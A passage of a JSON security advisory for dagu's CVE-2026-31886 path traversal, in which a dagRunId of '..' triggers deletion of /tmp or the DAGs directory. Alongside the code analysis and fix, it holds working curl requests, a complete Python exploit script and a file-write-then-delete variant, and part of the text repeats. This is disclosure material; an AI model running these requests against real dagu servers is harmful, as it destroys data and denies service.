"CSAFPID-5701009" } }, { "category": "product_version_range", "name": "vers:unknown/v1.7.3", "product": { "name": "vers:unknown/v1.7.3", "product_id": "CSAFPID-5701010" } }, { "category": "product_version_range", "name": "vers:unknown/v1.7.4", "product": { "name": "vers:unknown/v1.7.4", "product_id": "CSAFPID-5701011" } }, { "category": "product_version_range", "name": "vers:unknown/v1.7.5", "product": { "name": "vers:unknown/v1.7.5", "product_id": "CSAFPID-5701012" } }, { "category": "product_version_range", "name": "vers:unknown/v1.7.6", "product": { "name": "vers:unknown/v1.7.6", "product_id": "CSAFPID-5701013" } }, { "category": "product_version_range", "name": "vers:unknown/v1.7.7", "product": { "name": "vers:unknown/v1.7.7", "product_id": "CSAFPID-5701014" } }, { "category": "product_version_range", "name": "vers:unknown/v1.7.8", "product": { "name": "vers:unknown/v1.7.8", "product_id": "CSAFPID-5701015" } }, { "category": "product_version_range", "name": "vers:unknown/v1.7.9", "product": { "name": "vers:unknown/v1.7.9", "product_id": "CSAFPID-5701016" } }, { "category": "product_version_range", "name": "vers:unknown/v1.8.0", "product": { "name": "vers:unknown/v1.8.0", "product_id": "CSAFPID-5701017" } }, { "category": "product_version_range", "name": "vers:unknown/v1.8.1", "product": { "name": "vers:unknown/v1.8.1", "product_id": "CSAFPID-5701018" } }, { "category": "product_version_range", "name": "vers:unknown/v1.8.2", "product": { "name": "vers:unknown/v1.8.2", "product_id": "CSAFPID-5701019" } }, { "category": "product_version_range", "name": "vers:unknown/v1.8.3", "product": { "name": "vers:unknown/v1.8.3", "product_id": "CSAFPID-5701020" } }, { "category": "product_version_range", "name": "vers:unknown/v1.8.4", "product": { "name": "vers:unknown/v1.8.4", "product_id": "CSAFPID-5701021" } }, { "category": "product_version_range", "name": "vers:unknown/v1.8.5", "product": { "name": "vers:unknown/v1.8.5", "product_id": "CSAFPID-5701022" } }, { "category": "product_version_range", "name": "vers:unknown/v1.8.6", "product": { "name": "vers:unknown/v1.8.6", "product_id": "CSAFPID-5701023" } }, { "category": "product_version_range", "name": "vers:unknown/v1.8.7", "product": { "name": "vers:unknown/v1.8.7", "product_id": "CSAFPID-5701024" } }, { "category": "product_version_range", "name": "vers:unknown/v1.8.8", "product": { "name": "vers:unknown/v1.8.8", "product_id": "CSAFPID-5701025" } }, { "category": "product_version_range", "name": "vers:unknown/v1.9.0", "product": { "name": "vers:unknown/v1.9.0", "product_id": "CSAFPID-5701026" } }, { "category": "product_version_range", "name": "vers:unknown/v1.9.1", "product": { "name": "vers:unknown/v1.9.1", "product_id": "CSAFPID-5701027" } }, { "category": "product_version_range", "name": "vers:unknown/v1.9.2", "product": { "name": "vers:unknown/v1.9.2", "product_id": "CSAFPID-5701028" } }, { "category": "product_version_range", "name": "vers:unknown/v1.9.3", "product": { "name": "vers:unknown/v1.9.3", "product_id": "CSAFPID-5701029" } }, { "category": "product_version_range", "name": "vers:unknown/v1.9.4", "product": { "name": "vers:unknown/v1.9.4", "product_id": "CSAFPID-5701030" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0", "product": { "name": "vers:unknown/v2.0.0", "product_id": "CSAFPID-5910285" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.1", "product": { "name": "vers:unknown/v2.0.1", "product_id": "CSAFPID-5910286" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.2", "product": { "name": "vers:unknown/v2.0.2", "product_id": "CSAFPID-5910287" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.3", "product": { "name": "vers:unknown/v2.0.3", "product_id": "CSAFPID-5910288" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.4", "product": { "name": "vers:unknown/v2.0.4", "product_id": "CSAFPID-5910289" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.5", "product": { "name": "vers:unknown/v2.0.5", "product_id": "CSAFPID-5910290" } }, { "category": "product_version_range", "name": "vers:unknown/v2.1.0", "product": { "name": "vers:unknown/v2.1.0", "product_id": "CSAFPID-5910291" } }, { "category": "product_version_range", "name": "vers:unknown/v2.1.1", "product": { "name": "vers:unknown/v2.1.1", "product_id": "CSAFPID-5910292" } }, { "category": "product_version_range", "name": "vers:unknown/v2.1.2", "product": { "name": "vers:unknown/v2.1.2", "product_id": "CSAFPID-5910293" } }, { "category": "product_version_range", "name": "vers:unknown/v2.1.3", "product": { "name": "vers:unknown/v2.1.3", "product_id": "CSAFPID-5910294" } }, { "category": "product_version_range", "name": "vers:unknown/v2.2.0", "product": { "name": "vers:unknown/v2.2.0", "product_id": "CSAFPID-5910295" } }, { "category": "product_version_range", "name": "vers:unknown/v2.2.1", "product": { "name": "vers:unknown/v2.2.1", "product_id": "CSAFPID-5910296" } }, { "category": "product_version_range", "name": "vers:unknown/v2.2.2", "product": { "name": "vers:unknown/v2.2.2", "product_id": "CSAFPID-5910297" } }, { "category": "product_version_range", "name": "vers:unknown/v2.2.3", "product": { "name": "vers:unknown/v2.2.3", "product_id": "CSAFPID-5910298" } } ], "category": "product_name", "name": "dagu" } ], "category": "vendor", "name": "dagu-org" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-31886", "cwe": { "id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')" }, "notes": [ { "category": "description", "text": "## 1. Vulnerability Summary\n\nThe `dagRunId` request field accepted by the inline DAG execution endpoints is passed directly into `filepath.Join` to construct a temporary directory path without any format validation. Go's `filepath.Join` resolves `..` segments lexically, so a caller can supply a value such as `\"..\"` to redirect the computed directory outside the intended `/tmp//` path. A deferred cleanup function that calls `os.RemoveAll` on that directory then runs unconditionally when the HTTP handler returns, deleting whatever directory the traversal resolved to.\n\nWith `dagRunId` set to `\"..\"`, the resolved directory is the system temporary directory (`/tmp` on Linux). On non-root deployments, `os.RemoveAll(\"/tmp\")` removes all files in `/tmp` owned by the dagu process user, disrupting every concurrent dagu run that has live temp files. On root or Docker deployments, the call removes the entire contents of `/tmp`, causing a system-wide denial of service.\n\n\n## 2. This Is Not a Duplicate of Existing Advisories\n\nTwo security advisories are already published for dagu. This vulnerability is distinct from both.\n\n**GHSA-6qr9-g2xw-cw92** fixed the fact that the default authentication mode was `none`, allowing unauthenticated access to the inline execution endpoint. That advisory covers authentication bypass. The `dagRunId` path traversal described here is a separate input-validation flaw in `loadInlineDAG()` that exists regardless of whether authentication is required and was not addressed by that fix.\n\n**CVE-2026-27598** fixed a path traversal in the DAG creation endpoint (`POST /api/v1/dags`) via the `name` field. The fix added `filepath.Base()` and a base-directory prefix check inside `generateFilePath()`. That fix applies only to `generateFilePath()` in `dags.go`. The function `loadInlineDAG()` in `dagruns.go` has no equivalent guard on its `dagRunID` argument and was not part of that patch.\n\n\n## 3. Vulnerable Code\n\n**File**: `internal/service/frontend/api/v1/dagruns.go`\n\nThe `loadInlineDAG` function (lines 202-267) constructs the temp directory at line 234:\n\n```go\ntmpDir := filepath.Join(os.TempDir(), nameHint, dagRunID)\n```\n\n`dagRunID` is user-supplied. No validation of the value occurs before this line. The cleanup closure is then registered:\n\n```go\ncleanup := func() {\n _ = os.RemoveAll(tmpDir)\n}\n```\n\nIn `ExecuteDAGRunFromSpec` (lines 52-119), the cleanup is deferred unconditionally:\n\n```go\ndag, cleanup, err := a.loadInlineDAG(ctx, request.Body.Spec, request.Body.Name, dagRunId)\nif err != nil {\n return nil, err\n}\ndefer cleanup() // registered after loadInlineDAG succeeds; fires on all subsequent return paths\n```\n\nThe same pattern appears in `EnqueueDAGRunFromSpec` (lines 122-200), line 160:\n\n```go\ndefer cleanup()\n```\n\n**Why the OpenAPI schema pattern does not prevent this:**\n\nThe `DAGRunId` schema in `api/v1/api.yaml` (line 5738) declares:\n\n```yaml\npattern: \"^[a-zA-Z0-9_-]+$\"\n```\n\nThis pattern excludes `.` and `/`, which would block path traversal values. However, enforcement of that pattern depends on the OpenAPI validator middleware, which is only activated when `StrictValidation` is `true`. That setting is defined in `internal/cmn/config/config.go`:\n\n```go\nStrictValidation bool\n```\n\nIt is not present in the `Definition` struct (`definition.go`) and carries no `mapstructure` tag, which means viper/mapstructure can never populate it from a YAML configuration file; it therefore cannot be set in the config loader (`loader.go`) and its value is always the Go zero value for `bool`, which is `false`. The loader test at line 165 of `loader_test.go` confirms that `StrictValidation` is `false` even after loading a comprehensive configuration file that exercises every configurable option — because there is no mechanism by which it could ever be `true`. The validator middleware is never registered for any standard dagu deployment.\n\nThe file `dagruns.go` defines a `sanitizeFilename` helper at line 36 that replaces characters outside `[a-zA-Z0-9._-]` with underscores. This function is called when constructing log filenames (lines 422, 566, 1127, and 1211) and is never applied to `dagRunID` before the `filepath.Join` call. No validation or sanitization of `dagRunID` for path separator characters exists anywhere in the request-to-`filepath.Join` pipeline.\n\n\n## 4. Attack Conditions\n\n- The attacker must be authenticated with a role of `operator`, `developer`, `manager`, or `admin` (any role for which `CanExecute()` returns true).\n- The server permission `PermissionRunDAGs` must be enabled. This is the default (`true` as set in `loader.go` lines 353-356).\n- On dagu versions 1.30.3 and earlier, where the default authentication mode was `none`, no authentication is required at all.\n\n\n## 5. Attack Scenario\n\n### Step 1: Authenticate\n\n```bash\nTOKEN=$(curl -s -X POST http://TARGET:8080/api/v1/auth/login \\\n -H \"Content-Type: application/json\" \\\n -d '{\"username\":\"operator\",\"password\":\"\"}' \\\n | python3 -c \"import sys,json; print(json.load(sys.stdin)['token'])\")\n```\n\nFor versions with `auth.mode: none`, authentication is not required and the `Authorization` header can be omitted.\n\n### Step 2: Send the malicious request\n\n```bash\ncurl -s -X POST http://TARGET:8080/api/v1/dag-runs \\\n -H \"Content-Type: application/json\" \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -d '{\n \"spec\": \"steps:\\n - name: s\\n command: id\\n\",\n \"dagRunId\": \"..\"\n }'\n```\n\n### Step 3: What happens inside the server\n\n1. `request.Body.DagRunId` is `\"..\"`. This value is copied to `dagRunId` at line 72 without modification.\n\n2. `loadInlineDAG` is called with `dagRunID = \"..\"` and no `name` parameter, so `nameHint = \"inline\"`. Because `name` is nil, the `else` branch at lines 214-231 runs first: `spec.LoadYAML` parses the spec content and `dag.Validate()` checks its structure. This pre-validation operates entirely on the YAML content; it has no knowledge of `dagRunID`. The exploit spec (`steps:\\n - name: s\\n command: id\\n`) passes this check. The `nameHint` variable is not updated by this parse — it stays `\"inline\"` regardless of any `name` field inside the spec YAML. Control reaches line 234 only after the spec is accepted.\n\n3. Line 234 executes:\n ```\n tmpDir = filepath.Join(\"/tmp\", \"inline\", \"..\")\n = filepath.Clean(\"/tmp/inline/..\")\n = \"/tmp\"\n ```\n (`filepath.Join` calls `filepath.Clean` on the joined result, resolving `..` lexically.)\n\n4. `os.MkdirAll(\"/tmp\", 0o750)` succeeds because `/tmp` already exists.\n\n5. The cleanup closure captures `tmpDir = \"/tmp\"`:\n ```go\n cleanup = func() { os.RemoveAll(\"/tmp\") }\n ```\n\n6. The spec is written to `filepath.Join(\"/tmp\", \"inline.yaml\")` = `/tmp/inline.yaml` and loaded via `spec.Load` (line 256). The load succeeds.\n\n7. `loadInlineDAG` returns `dag, cleanup, nil`.\n\n8. `defer cleanup()` is registered in `ExecuteDAGRunFromSpec`.\n\n9. The handler builds the 200 response object. In Go, deferred functions execute during the function's return sequence — before control returns to chi's server wrapper. The deferred cleanup therefore fires first: `os.RemoveAll(\"/tmp\")` runs and removes the target directory.\n\n10. The handler returns the response object to chi. Chi serializes it and sends the HTTP 200 to the client. The 200 is delivered successfully because the response content was already constructed before the defer ran; the directory deletion does not affect the HTTP response.\n\n### Step 4: Result\n\nOn non-root deployments: all files in `/tmp` owned by the dagu process user are removed (Linux sticky bit prevents deletion of files owned by other users). Any concurrent dagu runs that have live temp files in `/tmp` lose those files and fail.\n\nOn root or Docker deployments (where dagu runs as root inside a container, which is a common production pattern): all contents of `/tmp` are removed, affecting every process on the system that uses `/tmp` for temporary storage.\n\nThe attack can be sent repeatedly without any cooldown, maintaining the denial-of-service condition.\n\n\n## 6. Proof of Concept\n\n### One-liner (against auth-mode-none instance)\n\n```bash\ncurl -s -X POST http://localhost:8080/api/v1/dag-runs \\\n -H \"Content-Type: application/json\" \\\n -d '{\"spec\":\"steps:\\n - name: s\\n command: id\\n\",\"dagRunId\":\"..\"}'\n```\n\n### Automated PoC script\n\nSave as `poc.py` and run with `python3 poc.py`:\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nProof of Concept: dagu dagRunId path traversal\nAffected: POST /api/v1/dag-runs (executeDAGRunFromSpec)\n POST /api/v1/dag-runs/enqueue (enqueueDAGRunFromSpec)\n\nVulnerable line: dagruns.go:234\n tmpDir := filepath.Join(os.TempDir(), nameHint, dagRunID)\n\nUsage:\n python3 poc.py --url http://localhost:8080\n python3 poc.py --url http://localhost:8080 --username admin --password secret\n python3 poc.py --url http://localhost:8080 --token eyJ...\n\"\"\"\n\nimport argparse\nimport json\nimport os\nimport sys\nimport time\nimport urllib.request\nimport urllib.error\n\n\ndef login(base_url, username, password):\n payload = json.dumps({\"username\": username, \"password\": password}).encode()\n req = urllib.request.Request(\n f\"{base_url}/api/v1/auth/login\",\n data=payload,\n headers={\"Content-Type\": \"application/json\"},\n method=\"POST\",\n )\n try:\n with urllib.request.urlopen(req, timeout=10) as resp:\n data = json.loads(resp.read())\n token = data.get(\"token\") or data.get(\"accessToken\")\n if not token:\n print(f\"Login response did not contain a token: {data}\")\n sys.exit(1)\n return token\n except urllib.error.HTTPError as e:\n print(f\"Login failed (HTTP {e.code}): {e.read().decode()}\")\n sys.exit(1)\n\n\ndef send_exploit(base_url, token, traversal):\n body = json.dumps({\n \"spec\": \"steps:\\n - name: s\\n command: id\\n\",\n \"dagRunId\": traversal,\n }).encode()\n headers = {\"Content-Type\": \"application/json\"}\n if token:\n headers[\"Authorization\"] = f\"Bearer {token}\"\n req = urllib.request.Request(\n f\"{base_url}/api/v1/dag-runs\",\n data=body,\n headers=headers,\n method=\"POST\",\n )\n try:\n with urllib.request.urlopen(req, timeout=15) as resp:\n return resp.status, json.loads(resp.read())\n except urllib.error.HTTPError as e:\n return e.code, e.read().decode()\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--url\", default=\"http://localhost:8080\")\n parser.add_argument(\"--token\", default=\"\")\n parser.add_argument(\"--username\", default=\"admin\")\n parser.add_argument(\"--password\", default=\"\")\n parser.add_argument(\"--traversal\", default=\"..\",\n help=\"Value for dagRunId (default: '..')\")\n args = parser.parse_args()\n\n base_url = args.url.rstrip(\"/\")\n traversal = args.traversal\n\n import posixpath\n name_hint = \"inline\"\n expected_dir = posixpath.normpath(f\"/tmp/{name_hint}/{traversal}\")\n print(f\"Target server : {base_url}\")\n print(f\"dagRunId value: {repr(traversal)}\")\n print(f\"Resolved tmpDir (Linux): filepath.Join('/tmp', '{name_hint}', '{traversal}') = '{expected_dir}'\")\n print(f\"os.RemoveAll will target: '{expected_dir}'\")\n print()\n\n token = args.token\n if not token and args.password:\n print(\"Obtaining JWT token...\")\n token = login(base_url, args.username, args.password)\n print(f\"Token obtained: {token[:30]}...\")\n elif not token:\n print(\"No token provided. Proceeding without authentication (requires auth.mode: none).\")\n print()\n\n tmp_before = os.path.exists(expected_dir) if os.path.isabs(expected_dir) else None\n if tmp_before is not None:\n print(f\"'{expected_dir}' exists before request: {tmp_before}\")\n\n print(f\"Sending request to {base_url}/api/v1/dag-runs ...\")\n status, body = send_exploit(base_url, token, traversal)\n print(f\"HTTP {status}: {body}\")\n print()\n\n if status not in (200, 201):\n print(f\"Unexpected status {status}. Check credentials or server configuration.\")\n sys.exit(1)\n\n time.sleep(0.5)\n\n if tmp_before is not None:\n tmp_after = os.path.exists(expected_dir)\n print(f\"'{expected_dir}' exists after request: {tmp_after}\")\n if not tmp_after:\n print()\n print(\"CONFIRMED: path traversal caused os.RemoveAll to delete the target directory.\")\n else:\n print()\n print(\"Directory still exists. If running against a remote server, check\")\n print(f\"on the server host whether '{expected_dir}' was modified.\")\n else:\n print(f\"Cannot verify filesystem state from this host.\")\n print(f\"On the server, check whether '{expected_dir}' was modified after the request.\")\n\n\nif __name__ == \"__main__\":\n main()\n```\n\n### Local test setup (no existing dagu installation needed)\n\n```bash\n# Download the latest dagu binary\ncurl -L https://github.com/dagu-org/dagu/releases/latest/download/dagu_linux_amd64.tar.gz \\\n | tar -xz\n\n# Start with no authentication for simplest reproduction\ncat > /tmp/dagu-test.yaml <<'EOF'\nauth:\n mode: none\nEOF\n\n./dagu server --config /tmp/dagu-test.yaml &\nSERVER_PID=$!\nsleep 2\n\n# Confirm /tmp is accessible\necho \"Files in /tmp before: $(ls /tmp | wc -l)\"\n\n# Run the exploit\ncurl -s -X POST http://localhost:8080/api/v1/dag-runs \\\n -H \"Content-Type: application/json\" \\\n -d '{\"spec\":\"steps:\\n - name: s\\n command: id\\n\",\"dagRunId\":\"..\"}'\n\nsleep 1\n\n# Check whether dagu-owned temp files were deleted\necho \"Files in /tmp after: $(ls /tmp | wc -l)\"\n\nkill $SERVER_PID\n```\n\n### Variant: target the enqueue endpoint\n\nBoth endpoints are affected via the same `loadInlineDAG` call:\n\n```bash\ncurl -s -X POST http://TARGET:8080/api/v1/dag-runs/enqueue \\\n -H \"Content-Type: application/json\" \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -d '{\"spec\":\"steps:\\n - name: s\\n command: id\\n\",\"dagRunId\":\"..\"}'\n```\n\n### Variant: file write outside /tmp\n\nWith a `dagRunId` value that traverses to a known writable directory, the spec content is written there as `.yaml` before the cleanup removes that directory:\n\n```json\n{\n \"spec\": \"steps:\\n - name: s\\n command: id\\n\",\n \"name\": \"payload\",\n \"dagRunId\": \"../../home/dagu/dags\"\n}\n```\n\nThis writes `/home/dagu/dags/payload.yaml`, executes it, then calls `os.RemoveAll(\"/home/dagu/dags\")`, deleting the entire DAGs directory. The exact path depends on the deployment but can be inferred from error messages or default paths.\n\n\n## 7. Impact\n\n**Denial of Service (primary)**\n\nOn every deployment, an authenticated operator can send one request to trigger `os.RemoveAll` on a directory outside the intended temp subdirectory. With `dagRunId=\"..\"`, the target is `/tmp`. On a non-root deployment with Linux sticky bit semantics, all temp files in `/tmp` created by the dagu user are deleted. Any running dagu workflow that depends on temp files in progress is interrupted. The attack can be repeated continuously with no rate limiting, preventing recovery.\n\nOn Docker-based deployments where dagu runs as root inside a container (a common pattern for dagu installations), `os.RemoveAll(\"/tmp\")` removes all contents of `/tmp` inside the container. This affects every process in the container that uses `/tmp`, including shared libraries unpacked at runtime, unix sockets, and lock files.\n\n**Arbitrary file write (secondary)**\n\nThe spec YAML content provided by the attacker is written to `filepath.Join(tmpDir, nameHint+\".yaml\")` where both `tmpDir` and `nameHint` can be influenced. If the attacker knows or can guess the path of a directory writable by the dagu process (for example, the DAGs directory), they can write arbitrary YAML content there. Because `spec.Load` reads from that path and executes the spec, this also provides a mechanism for persisting a workflow definition containing attacker-controlled commands in the DAGs directory before the cleanup removes it.\n\n**Deletion of the DAGs directory (combined)**\n\nThe combination of the file write and the cleanup allows an authenticated operator to permanently delete the entire DAGs directory in a single request by pointing `dagRunId` at that path. This destroys all workflow definitions for all users of the dagu instance.\n\n\n## 8. Affected Versions\n\nThe `loadInlineDAG` function and both calling handlers (`ExecuteDAGRunFromSpec` and `EnqueueDAGRunFromSpec`) are present in the current `main` branch. The vulnerability has existed since these endpoints were introduced. No fix is present as of the review date of 2026-02-24.\n\nAuthentication requirements differ by version:\n- Versions 1.30.3 and earlier: default `auth.mode` was `none`, so this is exploitable without credentials\n- Versions after 1.30.3: default `auth.mode` is `builtin`, so operator-level credentials are required\n\n\n## 9. Recommended Fix\n\nValidate `dagRunID` before use in `loadInlineDAG`. The OpenAPI schema already defines the correct pattern. Enforce it at the application layer:\n\n```go\n// Add at the start of loadInlineDAG, before filepath.Join:\nvar validDAGRunID = regexp.MustCompile(`^[a-zA-Z0-9_-]+$`)\n\nif dagRunID != \"\" && !validDAGRunID.MatchString(dagRunID) {\n return nil, func() {}, &Error{\n HTTPStatus: http.StatusBadRequest,\n Code: api.ErrorCodeBadRequest,\n Message: \"dagRunId contains invalid characters\",\n }\n}\n```\n\nAs a defense-in-depth measure, verify that the resolved `tmpDir` is actually inside the expected base after joining:\n\n```go\ntmpDir := filepath.Join(os.TempDir(), nameHint, dagRunID)\nexpectedBase := filepath.Join(os.TempDir(), nameHint)\nif !strings.HasPrefix(tmpDir+string(filepath.Separator), expectedBase+string(filepath.Separator)) {\n return nil, func() {}, &Error{\n HTTPStatus: http.StatusBadRequest,\n Code: api.ErrorCodeBadRequest,\n Message: \"dagRunId resolves outside the permitted temp directory\",\n }\n}\n```\n\nThe same fix must be applied to both `ExecuteDAGRunFromSpec` and `EnqueueDAGRunFromSpec`. Additionally, enabling `StrictValidation: true` as the default configuration would provide an extra layer of enforcement at the API boundary.", "title": "github - https://github.com/advisories/GHSA-m4q3-457p-hh2x" }, { "category": "description", "text": "Dagu is a workflow engine with a built-in Web user interface. Prior to 2.2.4, the dagRunId request field accepted by the inline DAG execution endpoints is passed directly into filepath.Join to construct a temporary directory path without any format validation. Go's filepath.Join resolves .. segments lexically, so a caller can supply a value such as \"..\" to redirect the computed directory outside the intended /tmp// path. A deferred cleanup function that calls os.RemoveAll on that directory then runs unconditionally when the HTTP handler returns, deleting whatever directory the traversal resolved to. With dagRunId set to \"..\", the resolved directory is the system temporary directory (/tmp on Linux). On non-root deployments, os.RemoveAll(\"/tmp\") removes all files in /tmp owned by the dagu process user, disrupting every concurrent dagu run that has live temp files. On root or Docker deployments, the call removes the entire contents of /tmp, causing a system-wide denial of service. This vulnerability is fixed in 2.2.4.", "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-31886" }, { "category": "description", "text": "Dagu is a workflow engine with a built-in Web user interface. Prior to 2.2.4, the dagRunId request field accepted by the inline DAG execution endpoints is passed directly into filepath.Join to construct a temporary directory path without any format validation. Go's filepath.Join resolves .. segments lexically, so a caller can supply a value such as \"..\" to redirect the computed directory outside the intended /tmp// path. A deferred cleanup function that calls os.RemoveAll on that directory then runs unconditionally when the HTTP handler returns, deleting whatever directory the traversal resolved to. With dagRunId set to \"..\", the resolved directory is the system temporary directory (/tmp on Linux). On non-root deployments, os.RemoveAll(\"/tmp\") removes all files in /tmp owned by the dagu process user, disrupting every concurrent dagu run that has live temp files. On root or Docker deployments, the call removes the entire contents of /tmp, causing a system-wide denial of service. This vulnerability is fixed in 2.2.4.", "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-31886" }, { "category": "description", "text": "## 1. Vulnerability Summary\n\nThe `dagRunId` request field accepted by the inline DAG execution endpoints is passed directly into `filepath.Join` to construct a temporary directory path without any format validation. Go's `filepath.Join` resolves `..` segments lexically, so a caller can supply a value such as `\"..\"` to redirect the computed directory outside the intended `/tmp//` path. A deferred cleanup function that calls `os.RemoveAll` on that directory then runs unconditionally when the HTTP handler returns, deleting whatever directory the traversal resolved to.\n\nWith `dagRunId` set to `\"..\"`, the resolved directory is the system temporary directory (`/tmp` on Linux). On non-root deployments, `os.RemoveAll(\"/tmp\")` removes all files in `/tmp` owned by the dagu process user, disrupting every concurrent dagu run that has live temp files. On root or Docker deployments, the call removes the entire contents of `/tmp`, causing a system-wide denial of service.\n\n\n## 2. This Is Not a Duplicate of Existing Advisories\n\nTwo security advisories are already published for dagu. This vulnerability is distinct from both.\n\n**GHSA-6qr9-g2xw-cw92** fixed the fact that the default authentication mode was `none`, allowing unauthenticated access to the inline execution endpoint. That advisory covers authentication bypass. The `dagRunId` path traversal described here is a separate input-validation flaw in `loadInlineDAG()` that exists regardless of whether authentication is required and was not addressed by that fix.\n\n**CVE-2026-27598** fixed a path traversal in the DAG creation endpoint (`POST /api/v1/dags`) via the `name` field. The fix added `filepath.Base()` and a base-directory prefix check inside `generateFilePath()`. That fix applies only to `generateFilePath()` in `dags.go`. The function `loadInlineDAG()` in `dagruns.go` has no equivalent guard on its `dagRunID` argument and was not part of that patch.\n\n\n## 3. Vulnerable Code\n\n**File**: `internal/service/frontend/api/v1/dagruns.go`\n\nThe `loadInlineDAG` function (lines 202-267) constructs the temp directory at line 234:\n\n```go\ntmpDir := filepath.Join(os.TempDir(), nameHint, dagRunID)\n```\n\n`dagRunID` is user-supplied. No validation of the value occurs before this line. The cleanup closure is then registered:\n\n```go\ncleanup := func() {\n _ = os.RemoveAll(tmpDir)\n}\n```\n\nIn `ExecuteDAGRunFromSpec` (lines 52-119), the cleanup is deferred unconditionally:\n\n```go\ndag, cleanup, err := a.loadInlineDAG(ctx, request.Body.Spec, request.Body.Name, dagRunId)\nif err != nil {\n return nil, err\n}\ndefer cleanup() // registered after loadInlineDAG succeeds; fires on all subsequent return paths\n```\n\nThe same pattern appears in `EnqueueDAGRunFromSpec` (lines 122-200), line 160:\n\n```go\ndefer cleanup()\n```\n\n**Why the OpenAPI schema pattern does not prevent this:**\n\nThe `DAGRunId` schema in `api/v1/api.yaml` (line 5738) declares:\n\n```yaml\npattern: \"^[a-zA-Z0-9_-]+$\"\n```\n\nThis pattern excludes `.` and `/`, which would block path traversal values. However, enforcement of that pattern depends on the OpenAPI validator middleware, which is only activated when `StrictValidation` is `true`. That setting is defined in `internal/cmn/config/config.go`:\n\n```go\nStrictValidation bool\n```\n\nIt is not present in the `Definition` struct (`definition.go`) and carries no `mapstructure` tag, which means viper/mapstructure can never populate it from a YAML configuration file; it therefore cannot be set in the config loader (`loader.go`) and its value is always the Go zero value for `bool`, which is `false`. The loader test at line 165 of `loader_test.go` confirms that `StrictValidation` is `false` even after loading a comprehensive configuration file that exercises every configurable option — because there is no mechanism by which it could ever be `true`. The validator middleware is never registered for any standard dagu deployment.\n\nThe file `dagruns.go` defines a `sanitizeFilename` helper at line 36 that replaces characters outside `[a-zA-Z0-9._-]` with underscores. This function is called when constructing log filenames (lines 422, 566, 1127, and 1211) and is never applied to `dagRunID` before the `filepath.Join` call. No validation or sanitization of `dagRunID` for path separator characters exists anywhere in the request-to-`filepath.Join` pipeline.\n\n\n## 4. Attack Conditions\n\n- The attacker must be authenticated with a role of `operator`, `developer`, `manager`, or `admin` (any role for which `CanExecute()` returns true).\n- The server permission `PermissionRunDAGs` must be enabled. This is the default (`true` as set in `loader.go` lines 353-356).\n- On dagu versions 1.30.3 and earlier, where the default authentication mode was `none`, no authentication is required at all.\n\n\n## 5. Attack Scenario\n\n### Step 1: Authenticate\n\n```bash\nTOKEN=$(curl -s -X POST http://TARGET:8080/api/v1/auth/login \\\n -H \"Content-Type: application/json\" \\\n -d '{\"username\":\"operator\",\"password\":\"\"}' \\\n | python3 -c \"import sys,json; print(json.load(sys.stdin)['token'])\")\n```\n\nFor versions with `auth.mode: none`, authentication is not required and the `Authorization` header can be omitted.\n\n### Step 2: Send the malicious request\n\n```bash\ncurl -s -X POST http://TARGET:8080/api/v1/dag-runs \\\n -H \"Content-Type: application/json\" \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -d '{\n \"spec\": \"steps:\\n - name: s\\n command: id\\n\",\n \"dagRunId\": \"..\"\n }'\n```\n\n### Step 3: What happens inside the server\n\n1. `request.Body.DagRunId` is `\"..\"`. This value is copied to `dagRunId` at line 72 without modification.\n\n2. `loadInlineDAG` is called with `dagRunID = \"..\"` and no `name` parameter, so `nameHint = \"inline\"`. Because `name` is nil, the `else` branch at lines 214-231 runs first: `spec.LoadYAML` parses the spec content and `dag.Validate()` checks its structure. This pre-validation operates entirely on the YAML content; it has no knowledge of `dagRunID`. The exploit spec (`steps:\\n - name: s\\n command: id\\n`) passes this check. The `nameHint` variable is not updated by this parse — it stays `\"inline\"` regardless of any `name` field inside the spec YAML. Control reaches line 234 only after the spec is accepted.\n\n3. Line 234 executes:\n ```\n tmpDir = filepath.Join(\"/tmp\", \"inline\", \"..\")\n = filepath.Clean(\"/tmp/inline/..\")\n = \"/tmp\"\n ```\n (`filepath.Join` calls `filepath.Clean` on the joined result, resolving `..` lexically.)\n\n4. `os.MkdirAll(\"/tmp\", 0o750)` succeeds because `/tmp` already exists.\n\n5. The cleanup closure captures `tmpDir = \"/tmp\"`:\n ```go\n cleanup = func() { os.RemoveAll(\"/tmp\") }\n ```\n\n6. The spec is written to `filepath.Join(\"/tmp\", \"inline.yaml\")` = `/tmp/inline.yaml` and loaded via `spec.Load` (line 256). The load succeeds.\n\n7. `loadInlineDAG` returns `dag, cleanup, nil`.\n\n8. `defer cleanup()` is registered in `ExecuteDAGRunFromSpec`.\n\n9. The handler builds the 200 response object. In Go, deferred functions execute during the function's return sequence — before control returns to chi's server wrapper. The deferred cleanup therefore fires first: `os.RemoveAll(\"/tmp\")` runs and removes the target directory.\n\n10. The handler returns the response object to chi. Chi serializes it and sends the HTTP 200 to the client. The 200 is delivered successfully because the response content was already constructed before the defer ran; the directory deletion does not affect the HTTP response.\n\n### Step 4: Result\n\nOn non-root deployments: all files in `/tmp` owned by the dagu process user are removed (Linux sticky bit prevents deletion of files owned by other users). Any concurrent dagu runs that have live temp files in `/tmp` lose those files and fail.\n\nOn root or Docker deployments (where dagu runs as root inside a container, which is a common production pattern): all contents of `/tmp` are removed, affecting every process on the system that uses `/tmp` for temporary storage.\n\nThe attack can be sent repeatedly without any cooldown, maintaining the denial-of-service condition.\n\n\n## 6. Proof of Concept\n\n### One-liner (against auth-mode-none instance)\n\n```bash\ncurl -s -X POST http://localhost:8080/api/v1/dag-runs \\\n -H \"Content-Type: application/json\" \\\n -d '{\"spec\":\"steps:\\n - name: s\\n command: id\\n\",\"dagRunId\":\"..\"}'\n```\n\n### Automated PoC script\n\nSave as `poc.py` and run with `python3 poc.py`:\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nProof of Concept: dagu dagRunId path traversal\nAffected: POST /api/v1/dag-runs 